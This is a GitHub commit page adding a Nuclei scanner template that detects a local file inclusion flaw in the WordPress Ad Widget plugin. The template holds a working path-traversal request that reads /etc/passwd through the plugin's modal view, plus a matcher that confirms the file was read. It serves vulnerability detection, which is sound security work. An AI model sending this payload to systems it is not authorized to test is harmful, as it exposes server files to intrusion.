-
-
Notifications
You must be signed in to change notification settings - Fork 196
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Auto Update Nuclei [Sat Nov 6 01:06:52 UTC 2021] :robot:
- Loading branch information
1 parent
6c758b5
commit 845bb09
Showing
1 changed file
with
27 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
id: ad-widget-lfi | ||
|
||
info: | ||
name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0) | ||
author: 0x_Akoko | ||
severity: high | ||
description: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. | ||
reference: | ||
- https://cxsecurity.com/issue/WLB-2017100084 | ||
- https://plugins.trac.wordpress.org/changeset/1628751/ad-widget | ||
tags: wordpress,wp-plugin,lfi | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00" | ||
|
||
matchers-condition: and | ||
matchers: | ||
|
||
- type: regex | ||
regex: | ||
- "root:[x*]:0:0" | ||
|
||
- type: status | ||
status: | ||
- 200 |